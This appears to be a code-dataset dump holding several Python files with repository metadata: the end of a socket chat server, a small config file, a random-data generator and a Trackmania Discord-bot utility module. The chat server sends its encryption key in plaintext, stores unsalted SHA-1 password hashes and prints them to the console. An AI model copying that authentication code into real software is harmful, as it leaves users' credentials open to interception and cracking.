# Send data using above function
send_to_client(receiversoc, message, keys[i])
# A custom function for sending a message to all users
def msg_all(message, sender):
# Constructing so client knows what this message is
construct = "^"+ sender + " " + message
# Send data using above function
send_all(sender, construct)
# A custom function for telling all clients about a new logon
def new_online(user):
# Construciting
construct = '+' + user
# Sending to all using function
send_all(user, construct)
# A custom function to check if a file exists without throwing errors
def file_exists(name):
filename = name + ".txt"
try:
my_file = open(filename)
my_file.close()
return True
except:
return False
# A utility function to allow quick updating of saved passwords and profile pictures
def updatefile(name, obj):
# Open file
with open(name, 'wb+') as file:
# Dump new data
pickle.dump(obj, file)
# The main function for communicating with clients on a new thread
# This handles most work and messaging duties
# NOTE: this is run on one thread per client
def on_new_client(clientsocket,addr):
# A string for storing username
username = ''
# Encryption Handshake
print("NETOWRK: Attempting handshake with: " + addr[0] + ":" + str(addr[1]))
# Generating a new COMPLETELY RANDOM key
key = get_random_bytes(16)
# Exchanging (not secure)
clientsocket.send(key)
# Receiving other key
otherkey = clientsocket.recv(1024)
# Printing it on console
print("NETWORK: Server key: " + str(key) + ", "+ str(addr[0]) + ":" + str(addr[1]) + " key:", str(otherkey))
# Wrapped in try except to detect logging off of users
try:
# Attempting sign in and sing up
while True:
# Receive data
login = client_receive(clientsocket, otherkey)
print("DEBUG: login / signup attempt", login)
# Making sure the client hasn't disconnected
if login == "disconnect":
clientsocket.close()
break
# Splitting username and password, clients have already validated input
user, passw = login[1:].split()
passw = passw.encode("utf-8")
# Hashing the password
passw = hashlib.sha1(passw)
# Storing hashed password in hex form
passw = passw.hexdigest()
print("DEBUG: Hashed password is: " + str(passw))
# if sign up else if login attempt
if(login[0] == '?'):
# Creating an account
# If user hasn't already signed up
if user not in loginss:
# Store username and password combo in memory
loginss[user] = passw;
# Tell the client
send_to_client(clientsocket, "$success-signup", key)
# Give them default profile pic
pics[user] = 0
# Update relevant storage
updatefile("loginss.txt", loginss)
updatefile("pic.txt", pics)
print("USERS:", user, "signed up")
else:
# Else tell them they failed
send_to_client(clientsocket, "$fail-signup", key)
print("USERS: Received failed signup")
continue
elif(login[0] == '!'):
# Logging in
# In a try except to prevent key errors
try:
if(loginss[user] == passw):
# This is a successful login
# Marking such on server
username = user
# Tell the client
send_to_client(clientsocket, "$success-login", key)
print("USERS:", username, "signed in")
break
else:
# Unsuccessful login
# Tell them they failed
send_to_client(clientsocket, "$fail-login", key)
except:
# Probably key error, they need to sign up first
# Tell them they failed
send_to_client(clientsocket, "$fail-login", key)
# Only if they have logged in successfully
if(username != ''):
# If they are not connected (should be almost always)
if username not in connected_list:
# mark thier username as conncted
connected_list.append(username)
# Tell clients about new profile picture and new client username
send_all(username, "p"+str(pics[username])+" "+username)
new_online(username)
print("USERS: Sent", username, "is online")
# Record sockets and keys for easy access by utility functions
record[clientsocket] = username
records[username] = clientsocket
keys[username] = key
# Listen and act until told not to
while True:
# Receive using function
msg = client_receive(clientsocket, otherkey)
# Make sure client hasnt disconnected
if msg == "disconnect":
# If they have tell other clients and remove them from lists
connected_list.remove(username)
del keys[username]
clientsocket.close()
send_all("", "-"+username)
print("Users: " + username + " quit")
break
# Interpreting comands from clients using codes from the table at the top
if msg[0] == '@':
# Split message
recievername = msg[1:].split(" ", 1)
# Determine sockets and keys
receiversoc = records[recievername[0]]
reckey = keys[recievername[0]]
# Create message
tosend = "@" + username + " " + recievername[1]
print("MESSAGES: " + username + " SENT " + recievername[1] + " TO " + recievername[0])
# Send
send_to_client(receiversoc, tosend, reckey)
elif msg[0] == '^':
# Determine sendername
sendername = record[clientsocket]
# Remove whitespace
tosend = msg[1:].strip()
print("MESSAGES: " + sendername + " SENT " + tosend + " TO ALL USERS")
# Send to all using function
msg_all(tosend, sendername)
elif msg[0] == '*':
# If request connected list, send list
print("DEBUG:", username, "requested list")
send_to_client(clientsocket, connected_list, key)
elif msg[0] == 'p':
# Determine sendername
sendername = record[clientsocket]
# Update memory list and file
pics[sendername] = msg[1]
updatefile("pic.txt", pics)
# Tell other clients of updated picture
send_all('', msg + " " + sendername)
print("USERS:", sendername, "changed their profile picture to:", msg[1])
elif msg[0] == '=':
# If request pic dict, send pic dict
print("DEBUG:", username, "requested pics dict")
send_to_client(clientsocket, pics, key)
except:
# This is usually a logoff
try:
# This is when they are registered and logged in
clientsocket.close()
connected_list.remove(username)
del keys[username]
# Tell other clients
send_all("", "-"+username)
print("USERS: " + username + " quit")
except:
# If they arn't registered, the above code will have already closed the socket, so just record and quit
print("USERS: Non-Authenicated user quit")
# Code skips to here
# Check if both files exist and populate memory with their contents it they do
# If they don't, set memory contents to empty and create files
# Also log it at the end, so the server runner knows what just happened
if file_exists("loginss") == False:
file = open("loginss.txt", "w+")
file.close()
with open('loginss.txt', 'rb') as file:
try:
loginss = pickle.load(file)
except:
print("DEBUG: Failed reading file (the login file is probably empty, no need to worry)")
if file_exists("pic") == False:
file = open("pic.txt", "w+")
file.close()
with open('pic.txt', 'rb') as file:
try:
pics = pickle.load(file)
except:
print("DEBUG: Failed reading file (the pic file is probably empty, no need to worry)")
# Telling the host that it doesn't need to filter ips
host = ''
# Setting the port
port = 443
# Bind to the port
s.bind((host, port))
# Allow up to ten messages stcked up
s.listen(10)
# Now wait for client connection.
print("DEBUG: Started on:", (host, port))
print("DEBUG: Ready for clients")
while True:
# Blocking call, waits to accept a connection
conn, addr = s.accept()
# Log it
print("NETWORK: Connected to " + addr[0] + ":" + str(addr[1]))
# Start a new thread to new client
threading.Thread(target=on_new_client, args=(conn,addr)).start()
print("\nDEBUG: Started new thread")
# Main thread continues listening loop to assingn new threads to new clients
# In the rare case we are here, close down the server socket gracefully and then quit
s.close()
| 38.820059 | 115 | 0.572188 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,109 | 0.46421 |
1fe7b45de50e9ea21f771782230c1d73959dc62a
| 215 |
py
|
Python
|
devmine/config/environments/production.py
|
sniperkit/snk.fork.devmine-core
|
6ab43abd0c1041831ecb86dcba55ffd9e05ce615
|
[
"BSD-3-Clause"
] | null | null | null |
devmine/config/environments/production.py
|
sniperkit/snk.fork.devmine-core
|
6ab43abd0c1041831ecb86dcba55ffd9e05ce615
|
[
"BSD-3-Clause"
] | null | null | null |
devmine/config/environments/production.py
|
sniperkit/snk.fork.devmine-core
|
6ab43abd0c1041831ecb86dcba55ffd9e05ce615
|
[
"BSD-3-Clause"
] | null | null | null |
# server backend
server = 'cherrypy'
# debug error messages
debug = False
# auto-reload
reloader = False
# database url
db_url = 'sqlite:///devmine/db/devmine.db'
# echo database engine messages
db_echo = False
| 14.333333 | 42 | 0.730233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 139 | 0.646512 |
1fe923af70915246d98e2a502a9e9ce347a11d16
| 1,279 |
py
|
Python
|
gen_screens.py
|
shurkova/currentVers
|
25027f3f4faa9033b69041459f0785c1436c3f31
|
[
"CECILL-B"
] | 1 |
2020-09-09T15:30:38.000Z
|
2020-09-09T15:30:38.000Z
|
gen_screens.py
|
shurkova/currentVers
|
25027f3f4faa9033b69041459f0785c1436c3f31
|
[
"CECILL-B"
] | null | null | null |
gen_screens.py
|
shurkova/currentVers
|
25027f3f4faa9033b69041459f0785c1436c3f31
|
[
"CECILL-B"
] | 11 |
2020-05-01T09:03:14.000Z
|
2022-02-09T14:17:41.000Z
|
# generate 500 screens.
import random
objs = []
for i in range(500):
go_to = random.choice([2,3])
for j in range(go_to):
new_obj = {'name': 'non_exist', 'RBs': [], 'set': 'memory', 'analog': i}
width = round(random.random()*20)
hight = round(random.random()*10)
x = round(random.random()*300)
y = round(random.random()*800)
colour = random.choice([255, 155, 55, 100])
new_obj['RBs'].append({'pred_name': 'non_exist', 'pred_sem': [], 'higher_order': False, 'object_name': 'obj'+str(random.random()), 'object_sem': [['x_ext', 1, 'x_ext', 'nil', 'state'], ['x_ext'+str(width), 1, 'x_ext', width, 'value'], ['y_ext', 1, 'y_ext', 'nil', 'state'], ['y_ext'+str(hight), 1, 'y_ext', hight, 'value'], ['total_ext', 1, 'total_ext', 'nil', 'state'], ['total_ext'+str(width*hight), 1, 'total_ext', width*hight, 'value'], ['x', 1, 'x', 'nil', 'state'], ['x'+str(x), 1, 'x', width*hight, 'value'], ['y', 1, 'y', 'nil', 'state'], ['y'+str(x), 1, 'y', width*hight, 'value'], ['colour', 1, 'colour', 'nil', 'state'], [str(colour), 1, 'colour', colour, 'value']], 'P': 'non_exist'})
objs.append(new_obj)
write_file = open('screens.py', 'w')
write_file.write('simType=\'sim_file\' \nsymProps = ' + str(objs))
| 51.16 | 704 | 0.56294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 474 | 0.370602 |
1fec0bf47c009cdb0ca6fac21df153c55c6c1431
| 46,269 |
py
|
Python
|
bot/utils/trackmania.py
|
NottCurious/TMIndiaBot
|
824c171fa2f41aa21631796c384f70a34a721364
|
[
"MIT"
] | 1 |
2022-02-12T16:40:17.000Z
|
2022-02-12T16:40:17.000Z
|
bot/utils/trackmania.py
|
NottCurious/TMIndiaBot
|
824c171fa2f41aa21631796c384f70a34a721364
|
[
"MIT"
] | 78 |
2021-10-14T05:32:54.000Z
|
2022-01-21T09:22:37.000Z
|
bot/utils/trackmania.py
|
NottCurious/TMIndiaBot
|
824c171fa2f41aa21631796c384f70a34a721364
|
[
"MIT"
] | null | null | null |
import asyncio
import json
import os
import shutil
import typing
from datetime import datetime, timezone, timedelta
from matplotlib import pyplot as plt
import cv2
import country_converter as coco
import flag
import requests
import discord
from bot.api import APIClient
from bot.log import get_logger
from bot.utils.commons import Commons
from bot.utils.database import Database
from bot.utils.discord import EZEmbed
log = get_logger(__name__)
class TrackmaniaUtils:
"""Functions relating to a specific Trackmania player who is given while creating the object"""
def __init__(self, username: str):
self.username = username
self.api_client = APIClient()
async def close(self):
"""Closes the API Client"""
await self.api_client.close()
return
async def get_id(self) -> str:
"""Gets the ID of the Player from the API
Raises:
NotAValidUsername: If the username is not valid, this exception is raised.
Returns:
str: The ID of the player
"""
log.debug("Checking if the ID is in the file")
id = Database.retrieve_id(self.username)
if id is None:
log.debug("Getting the data from the TMIndiaBotAPI")
id_data = await self.api_client.get(
f"http://localhost:3000/tm2020/player/{self.username}/id",
raise_for_status=False,
)
try:
id = id_data["id"]
except KeyError:
id = None
log.debug("Storing the Username and ID to the file")
Database.store_id(self.username, id)
else:
log.debug("Username exists in file")
return id
async def get_player_data(
self, player_id: str
) -> typing.Union[list, discord.Embed, None]:
"""Gets the player data as a list of embeds
Page 1 contains the Zone, Zone Ranks and Metadata of the player
Page 2 contains the Matchmaking and Royal Data
Page 3 contains the individual trophy counts
Args:
player_id (str): The player's id
Returns:
typing.Union[list, discord.Embed, None]: The player data in a list of 3 embed.
If the player does not exist, returns a single error embed.
"""
log.debug(f"Getting Data for {player_id}")
raw_player_data = await self.api_client.get(
f"http://localhost:3000/tm2020/player/{player_id}"
)
log.debug("Getting Player Flag Unicode")
player_flag_unicode = self._get_player_country_flag(raw_player_data)
log.debug(f"Got Player Unicode flag -> {player_flag_unicode}")
display_name = raw_player_data["displayname"]
log.debug(f"Display Name is {display_name}")
log.debug("Checking if Player has Played the Game")
if raw_player_data["trophies"]["points"] == 0:
return [
EZEmbed.create_embed(
title=f"{player_flag_unicode} {display_name} has never played Trackmania 2020",
color=0xFF0000,
)
]
log.debug("Creating Two Embeds")
page_one = EZEmbed.create_embed(
title=f"Player Data for {player_flag_unicode} {display_name} - Page 1",
color=Commons.get_random_color(),
)
page_two = EZEmbed.create_embed(
title=f"Player Data for {player_flag_unicode} {display_name} - Page 2",
color=Commons.get_random_color(),
)
page_three = EZEmbed.create_embed(
title=f"Player Data for {player_flag_unicode} {display_name} - Page 3",
color=Commons.get_random_color(),
)
zones, zone_ranks = self._get_zones_and_positions(raw_player_data)
royal_data = self._get_royal_data(raw_player_data)
matchmaking_data = self._get_matchmaking_data(raw_player_data)
trophy_count = self._get_trophy_count(raw_player_data)
log.debug("Adding Zones and Zone Ranks to Page One")
page_one.add_field(name="Zones", value=zones, inline=False)
page_one.add_field(name="Zone Ranks", value=zone_ranks, inline=False)
log.debug("Adding Matchmaking and Royal Data to Page Two")
page_two.add_field(name="Matchmaking", value=matchmaking_data, inline=False)
page_two.add_field(name="Royal", value=royal_data, inline=False)
log.debug("Adding Trophy Count to Page Three")
page_three.add_field(name="Trophy Count", value=trophy_count, inline=False)
try:
log.debug("Adding Meta Data to Page One")
page_one = self._add_meta_details(page_one, raw_player_data)
log.debug("Added Meta Data to Page One")
except:
log.debug("Player does not have Meta Data")
log.debug(f"Returning {page_one}, {page_two} and {page_three}")
return [page_one, page_two, page_three]
async def get_cotd_data(self, user_id: str) -> discord.Embed:
log.debug(f"Requesting COTD Data for {user_id} (Username: {self.username})")
cotd_data = await self.api_client.get(
f"http://localhost:3000/tm2020/player/{user_id}/cotd"
)
try:
if cotd_data["error"]:
log.critical(f"{self.username} has never played a cotd")
return (
EZEmbed.create_embed(
title="This player has never played a COTD", colour=0xFF0000
),
None,
)
except:
pass
log.debug("Parsing Best Rank Overall Data")
best_rank_overall = COTDUtil.get_best_rank_overall(cotd_data)
best_div_overall = COTDUtil.get_best_div_overall(cotd_data)
best_div_rank_overall = COTDUtil.get_best_div_rank_overall(cotd_data)
log.debug("Parsed Best Rank Overall Data")
log.debug("Parsing Best Rank Primary Data")
best_rank_primary = COTDUtil.get_best_rank_primary(cotd_data)
best_div_primary = COTDUtil.get_best_div_primary(cotd_data)
best_div_rank_primary = COTDUtil.get_best_div_rank_primary(cotd_data)
log.debug("Parsed Best Rank Primary Data")
log.debug("Parsing Average Rank Overall Data")
average_rank_overall = COTDUtil.get_average_rank_overall(cotd_data)
average_div_overall = COTDUtil.get_average_div_overall(cotd_data)
average_div_rank_overall = COTDUtil.get_average_div_rank_overall(cotd_data)
log.debug("Parsed Average Rank Overall Data")
log.debug("Parsing Average Rank Primary Data")
average_rank_primary = COTDUtil.get_average_rank_primary(cotd_data)
average_div_primary = COTDUtil.get_average_div_primary(cotd_data)
average_div_rank_primary = COTDUtil.get_average_div_rank_primary(cotd_data)
log.debug("Parsed Average Rank Primary Data")
log.debug("Creating Strings for Embed")
best_data_overall = f"```Best Rank: {best_rank_overall}\nBest Div: {best_div_overall}\nBest Rank in Div: {best_div_rank_overall}\n```"
best_data_primary = f"```Best Rank: {best_rank_primary}\nBest Div: {best_div_primary}\nBest Rank in Div: {best_div_rank_primary}\n```"
average_data_overall = f"```Average Rank: {average_rank_overall}\nAverage Div: {average_div_overall}\nAverage Rank in Div: {average_div_rank_overall}\n```"
average_data_primary = f"```Average Rank: {average_rank_primary}\nAverage Div: {average_div_primary}\nAverage Rank in Div: {average_div_rank_primary}\n```"
log.debug("Created Strings for Embed")
log.debug("Creating Embed Page")
cotd_data_embed = EZEmbed.create_embed(
title=f"COTD Data for {self.username}", color=Commons.get_random_color()
)
log.debug("Created Embed Page")
log.debug("Adding Fields")
cotd_data_embed.add_field(
name="Best Data Overall", value=best_data_overall, inline=False
)
cotd_data_embed.add_field(
name="Best Data Primary (No Reruns)", value=best_data_primary, inline=False
)
cotd_data_embed.add_field(
name="Average Data Overall", value=average_data_overall, inline=False
)
cotd_data_embed.add_field(
name="Average Data Primary (No Reruns)",
value=average_data_primary,
inline=False,
)
log.debug("Added Fields")
cotd_data_embed.set_footer(
text="This function does not include COTDs where the player has left after the 15mins qualifying"
)
log.debug("Getting Rank Data for Plots")
ranks_overall = COTDUtil.get_list_of_ranks_overall(cotd_data)
ranks_primary = COTDUtil.get_list_of_ranks_primary(cotd_data)
log.debug("Getting IDs of Ranks for Plots")
dates_overall = COTDUtil.get_list_of_dates_overall(cotd_data)
dates_primary = COTDUtil.get_list_of_dates_primary(cotd_data)
log.debug("Getting IDs for Plot")
ids_overall = COTDUtil.get_list_of_ids_overall(cotd_data)
ids_primary = COTDUtil.get_list_of_ids_primary(cotd_data)
log.debug("Creating Plots for Ranks Overall and Ranks Primary")
# Use Threading here
log.debug("Creating Plot for Overall")
COTDUtil._create_rank_plot(
ranks=ranks_overall,
dates=dates_overall,
ids=ids_overall,
plot_name="Overall Ranks (With Reruns)",
image_name="overallranks",
)
log.debug("Creating Plot for Primary")
COTDUtil._create_rank_plot(
ranks=ranks_primary,
dates=dates_primary,
ids=ids_primary,
plot_name="Primary Rank Graph (No Reruns)",
image_name="primaryranks",
)
log.debug("Concatenating Both Graphs into One")
COTDUtil._concat_graphs()
log.debug("Opening Concatenated Graphs")
image = discord.File(
"./bot/resources/temp/concatenated_graphs.png",
filename="concatenated_graphs.png",
)
log.debug("Opened Concatenated graphs")
log.debug("Adding the Image to the Embed")
cotd_data_embed.set_image(url="attachment://concatenated_graphs.png")
return cotd_data_embed, image
def _get_player_country_flag(self, raw_player_data: dict):
"""Gets the country that the player is from as unicode characters"""
log.debug("Getting Zones")
try:
zone_one = raw_player_data["trophies"]["zone"]["name"]
zone_two = raw_player_data["trophies"]["zone"]["parent"]["name"]
log.debug(f"Zones -> {zone_one} and {zone_two}")
continents = (
"Asia",
"Middle East",
"Europe",
"North America",
"South America",
"Africa",
)
if zone_two in continents:
log.debug("Only First Zone is Required")
iso_letters = coco.convert(names=[zone_one], to="ISO2")
unicode_letters = flag.flag(iso_letters)
else:
log.debug("Need to use Zone Two")
iso_letters = coco.convert(names=[zone_two], to="ISO2")
unicode_letters = flag.flag(iso_letters)
log.debug(f"Unicode Letters are {unicode_letters}")
return unicode_letters
except:
log.error("Player has never played Trackmania 2020")
return ":flag_white:"
def _get_royal_data(self, raw_player_data: dict) -> str:
"""Gets the royal data of the player as a string"""
log.debug("Getting Player Data")
try:
royal_data = raw_player_data["matchmaking"][1]
rank = royal_data["info"]["rank"]
wins = royal_data["info"]["progression"]
current_div = royal_data["info"]["division"]["position"]
if wins != 0:
progression_to_next_div = (
round(
(wins - royal_data["info"]["division"]["minwins"])
/ (
royal_data["info"]["division"]["maxwins"]
- royal_data["info"]["division"]["minwins"]
+ 1
),
4,
)
* 100
)
else:
log.debug("Player Has Not Won a Single Royal Match")
progression_to_next_div = "0"
log.debug(
f"Creating Royal Data String with {rank}, {wins}, {current_div} and {progression_to_next_div}"
)
royal_data_string = f"```Rank: {rank}\nWins: {wins}\nCurrent Division: {current_div}\nProgression to Next Division: {progression_to_next_div}%```"
log.debug(f"Created Royal Data String -> {royal_data_string}")
return royal_data_string
except:
return (
"An Error Occured While Getting Royal Data, Player has not played Royal"
)
def _get_matchmaking_data(self, raw_player_data: dict) -> str:
"""Gets the matchmaking data of the player as a string"""
log.debug("Getting Matchmaking Data")
try:
matchmaking_data = raw_player_data["matchmaking"][0]
rank = matchmaking_data["info"]["rank"]
score = matchmaking_data["info"]["score"]
current_div = int(matchmaking_data["info"]["division"]["position"])
log.debug("Opening the MM Ranks File")
with open(
"./bot/resources/json/mm_ranks.json", "r", encoding="UTF-8"
) as file:
mm_ranks = json.load(file)
current_div = mm_ranks["rank_data"][str(current_div - 1)]
log.debug("Calculating Progression to Next Division")
progression_to_next_div = (
round(
(score - matchmaking_data["info"]["division"]["minpoints"])
/ (
matchmaking_data["info"]["division"]["maxpoints"]
- matchmaking_data["info"]["division"]["minpoints"]
+ 1
),
4,
)
* 100
)
log.debug(
f"Creating Matchmaking Data String with {rank}, {score}, {current_div}, {progression_to_next_div}"
)
matchmaking_data_string = f"```Rank: {rank}\nScore: {score}\nCurrent Division: {current_div}\nProgression to Next Division: {progression_to_next_div}%```"
log.debug(f"Created Matchmaking Data String -> {matchmaking_data_string}")
return matchmaking_data_string
except:
log.error("Player has never Played Matchmaking")
return "An error Occured While Getting Matchmaking Data, Player has not played Matchmaking"
def _get_trophy_count(self, raw_player_data: dict) -> str:
"""The trophy counts as a string"""
log.debug("Getting Trophy Counts")
trophy_count_string = "```\n"
log.debug("Adding Total Points")
total_points = Commons.add_commas(raw_player_data["trophies"]["points"])
trophy_count_string += f"Total Points: {total_points}\n\n"
log.debug(f"Added Total Points -> {total_points}")
for i, trophy_count in enumerate(raw_player_data["trophies"]["counts"]):
trophy_count_string = (
trophy_count_string + f"Trophy {i + 1}: {trophy_count}\n"
)
trophy_count_string += "```"
log.debug(f"Final Trophy Count -> {trophy_count_string}")
return trophy_count_string
def _get_zones_and_positions(self, raw_player_data) -> str:
"""
Converts raw_player_data into location and their ranks
"""
ranks_string = ""
log.debug("Getting Zones")
zone_one = raw_player_data["trophies"]["zone"]["name"]
zone_two = raw_player_data["trophies"]["zone"]["parent"]["name"]
zone_three = raw_player_data["trophies"]["zone"]["parent"]["parent"]["name"]
try:
zone_four = raw_player_data["trophies"]["zone"]["parent"]["parent"][
"parent"
]["name"]
except:
zone_four = ""
log.debug(f"Got Zones -> {zone_one}, {zone_two}, {zone_three}, {zone_four}")
log.debug("Getting Position Data")
raw_zone_positions = raw_player_data["trophies"]["zonepositions"]
zone_one_position = raw_zone_positions[0]
zone_two_position = raw_zone_positions[1]
zone_three_position = raw_zone_positions[2]
if zone_four != "":
zone_four_position = raw_zone_positions[3]
else:
zone_four_position = -1
log.debug("Got Position Data")
log.debug("Making string for position data")
ranks_string = "```\n"
ranks_string += f"{zone_one} - {zone_one_position}\n"
ranks_string += f"{zone_two} - {zone_two_position}\n"
ranks_string += f"{zone_three} - {zone_three_position}\n"
if zone_four != "":
ranks_string += f"{zone_four} - {zone_four_position}\n"
ranks_string += "```"
log.debug(f"Final Ranks String is {ranks_string}")
log.debug("Creating Zones String")
zones_string = f"```\n{zone_one}, {zone_two}, {zone_three}"
if zone_four != "":
zones_string += f", {zone_four}"
zones_string += "\n```"
return zones_string, ranks_string
def _add_meta_details(
self,
player_page: discord.Embed,
raw_player_data: dict,
) -> discord.Embed:
"""Adds the Metadata of a player to the first page of the embed
Args:
player_page (discord.Embed): the first page of player details
raw_player_data (dict): player data from the api
Returns:
discord.Embed: First page of the embed after metadata has been added
"""
log.debug("Adding Meta Details for Player")
meta_data = raw_player_data["meta"]
try:
log.debug("Checking if Player has Twitch")
twitch_name = meta_data["twitch"]
player_page.add_field(
name="[<:twitch:895250576751853598>] Twitch",
value=f"[{twitch_name}](https://twitch.tv/{twitch_name})",
inline=True,
)
log.debug("Twitch Added for Player")
except:
log.debug("Player does not have a Twitch Account Linked to TMIO")
try:
log.debug("Checking if Player has Twitter")
twitter_name = meta_data["twitter"]
player_page.add_field(
name="[<:twitter:895250587157946388>] Twitter",
value=f" [{twitter_name}](https://twitter.com/{twitter_name})",
inline=True,
)
log.debug("Twitter Added for Player")
except:
log.debug("Player does not have a Twitter Account Linked to TMIO")
try:
log.debug("Checking if Player has YouTube")
youtube_link = meta_data["youtube"]
player_page.add_field(
name="[<:youtube:895250572599513138>] YouTube",
value=f"[YouTube](https://youtube.com/channel/{youtube_link})",
inline=True,
)
log.debug("YouTube Added for Player")
except:
log.debug("Player does not have a YouTube Account Linked to TMIO")
log.debug("Adding TMIO")
display_name = raw_player_data["displayname"]
player_id = raw_player_data["accountid"]
player_page.add_field(
name="TMIO",
value=f"[{display_name}](https://trackmania.io/#/player/{player_id})",
)
try:
log.debug("Checking if TMGL Player")
if meta_data["tmgl"] is True:
player_page.add_field(
name="TMGL", value="This Player Participates in TMGL", inline=True
)
log.debug("Added TMGL Field")
except:
log.debug("Player does not participate in TMGL")
log.debug("Added TMIO Link")
log.debug(f"Returning {player_page}")
return player_page
class TOTDUtils:
@staticmethod
def _download_thumbail(url: str) -> None:
"""Downloads the Thumbnail from Nadeo's API and stores in `./bot/resources/temp/totd.png`"""
if os.path.exists("./bot/resources/temp/totd.png"):
log.debug("Thumbnail already downloaded")
return
req = requests.get(url, stream=True)
if req.status_code == 200:
log.debug("Image was retrieved succesfully")
req.raw.decode_content = True
log.debug("Saving Image to File")
with open("./bot/resources/temp/totd.png", "wb") as file:
shutil.copyfileobj(req.raw, file)
else:
log.critical("Image could not be retrieved")
@staticmethod
def _parse_mx_tags(self, tags: str) -> str:
"""Parses Maniaexchange tags to their strings
Args:
tags (str): The tags as a string of `ints`
Returns:
str: The tags as a string of `strings`
"""
log.debug(f"Tags -> {tags}")
log.debug("Removing Spaces")
tags.replace(" ", "")
log.debug(f"Without Spaces -> {tags}")
tags = tags.split(",")
tag_string = ""
with open("./bot/resources/json/mxtags.json", "r") as file:
mxtags = json.load(file)["mx"]
for i, tag in enumerate(tags):
log.debug(f"Converting {tag}")
for j in range(len(mxtags)):
if int(tag) == int(mxtags[j]["ID"]):
tag_string = tag_string + mxtags[j]["Name"] + ", "
log.debug(f"Tag String -> {tag_string}")
return tag_string[:-2]
@staticmethod
async def today():
"""The data of the current day's totd"""
log.info("Creating an API Client")
api_client = APIClient()
log.info("Created an API Client")
log.debug("Getting TOTD Data from API")
totd_data = await api_client.get("http://localhost:3000/tm2020/totd/latest")
log.debug("Parsing TOTD Data")
map_name = totd_data["name"]
author_name = totd_data["authorplayer"]["name"]
thumbnail_url = totd_data["thumbnailUrl"]
author_time = Commons.format_seconds(int(totd_data["authorScore"]))
gold_time = Commons.format_seconds(int(totd_data["goldScore"]))
silver_time = Commons.format_seconds(int(totd_data["silverScore"]))
bronze_time = Commons.format_seconds(int(totd_data["bronzeScore"]))
nadeo_uploaded = totd_data["timestamp"]
wr_holder = totd_data["leaderboard"]["tops"][0]["player"]["name"]
wr_time = Commons.format_seconds(
int(totd_data["leaderboard"]["tops"][0]["time"])
)
tmio_id = totd_data["mapUid"]
log.debug("Parsed TOTD Data")
log.debug("Parsing Download Link")
download_link = totd_data["fileUrl"]
log.debug("Parsed Download Link")
log.debug("Parsing Time Uploaded to Timestamp")
nadeo_timestamp = (
datetime.strptime(nadeo_uploaded[:-6], "%Y-%m-%dT%H:%M:%S")
.replace(tzinfo=timezone.utc)
.timestamp()
)
log.debug("Parsed Time Uploaded to Timestamps")
log.debug("Creating Strings from Parsed Data")
medal_times = f"<:author:894268580902883379> {author_time}\n<:gold:894268580970004510> {gold_time}\n<:silver:894268580655411220> {silver_time}\n<:bronze:894268580181458975> {bronze_time}"
world_record = f"Holder: {wr_holder}\nTime: {wr_time}"
nadeo_uploaded = f"<t:{int(nadeo_timestamp)}:R>"
log.debug("Created Strings from Parsed Data")
log.debug(
"Getting Map Thumbnail\nChecking if map Thumbnail has Already been Downloaded"
)
if not os.path.exists("./bot/resources/temp/totd.png"):
log.critical("Map Thumbail has not been downloaded")
TOTDUtils._download_thumbail(thumbnail_url)
log.debug("Parsing TM Exchange Data")
try:
mania_tags = totd_data["exchange"]["Tags"]
mx_uploaded = totd_data["exchange"]["UploadedAt"]
tmx_code = totd_data["exchange"]["TrackID"]
try:
mx_dt = datetime.strptime(mx_uploaded[:-3], "%Y-%m-%dT%H:%M:%S")
except ValueError:
mx_dt = datetime.strptime(mx_uploaded[:-4], "%Y-%m-%dT%H:%M:%S")
mx_timestamps = mx_dt.replace(tzinfo=timezone.utc).timestamp()
mx_uploaded = f"<t:{int(mx_timestamps)}:R>"
except:
log.critical("Map has never been uploaded to trackmania.exchange")
log.debug("Creating Embed")
current_day = datetime.now(timezone(timedelta(hours=5, minutes=30))).strftime(
"%d"
)
current_month = datetime.now(timezone(timedelta(hours=5, minutes=30))).strftime(
"%B"
)
# Add Day Suffix
if int(current_day) % 10 == 1:
day_suffix = "st"
elif int(current_day) % 10 == 2:
day_suffix = "nd"
elif int(current_day) % 10 == 3:
day_suffix = "rd"
else:
day_suffix = "th"
embed = EZEmbed.create_embed(
title=f"Here is the {current_day}{day_suffix} {current_month} TOTD",
color=Commons.get_random_color(),
)
log.debug("Creating Image File")
image = discord.File("./bot/resources/temp/totd.png", filename="totd.png")
embed.set_image(url="attachment://totd.png")
embed.add_field(name="Map Name", value=map_name, inline=False)
embed.add_field(name="Author", value=author_name, inline=True)
try:
embed.add_field(
name="Tags", value=TOTDUtils._parse_mx_tags(mania_tags), inline=False
)
except:
pass
embed.add_field(
name="Time Uploaded to Nadeo server", value=nadeo_uploaded, inline=False
)
try:
embed.add_field(name="Time Uploaded to TMX", value=mx_uploaded, inline=True)
except:
pass
embed.add_field(name="Medal Times", value=medal_times, inline=False)
embed.add_field(name="Word record", value=world_record, inline=False)
tmio_link = f"https://trackmania.io/#/leaderboard/{tmio_id}"
try:
tmx_link = f"https://trackmania.exchange/maps/{tmx_code}/"
except:
tmx_link = None
log.debug("Created Embed")
log.info("Closing the API Client")
await api_client.close()
log.info("Closed the API Embed")
return embed, image, download_link, tmio_link, tmx_link
class Leaderboards:
@staticmethod
def get_campaign_ids(year: str = "2021", season: str = "Fall") -> list[str]:
"""Gets a list of all campaign ids for a given year and season
Args:
year (str, optional): The year of the season. Defaults to "2021".
season (str, optional): The season itself. Defaults to "Fall".
Returns:
list[str]: List of ids
"""
log.debug(f"Opening {year}/{season.lower()} Data File")
with open(
f"./bot/resources/json/campaign/{year}/{season.lower()}.json",
"r",
encoding="UTF-8",
) as file:
file_data = json.load(file)
id_list = file_data["ids"]
log.debug("Not Ignoring First Five Maps")
return id_list
@staticmethod
async def update_campaign_leaderboards(
id_list: list[str],
year: str = "2021",
season: str = "Fall",
skip_first_five: bool = False,
):
"""Updates the leaderboard files for the campaign
Args:
id_list (list[str]): Campaign map id list
year (str, optional): The year of the season. Defaults to "2021"
season (str, optional): The season itself. Defaults to "Fall".
"""
log.info("Creating APIClient for Updating Campaign Leaderboards")
api_client = APIClient()
log.info("Created APIClient for Updating Campaign Leaderboards")
for i, id in enumerate(id_list):
leaderboard_data = []
log.debug("Getting Data from API")
leaderboard_data = await api_client.get(
f"http://localhost:3000/tm2020/leaderboard/{id}/5"
)
log.debug("Got Data from API")
with open(
f"./bot/resources/leaderboard/{year}/{season.lower()}/{i + 1}.json",
"w",
encoding="UTF-8",
) as file:
log.debug(f"Dumping Data to File -> {year}>{season}>{i+1}")
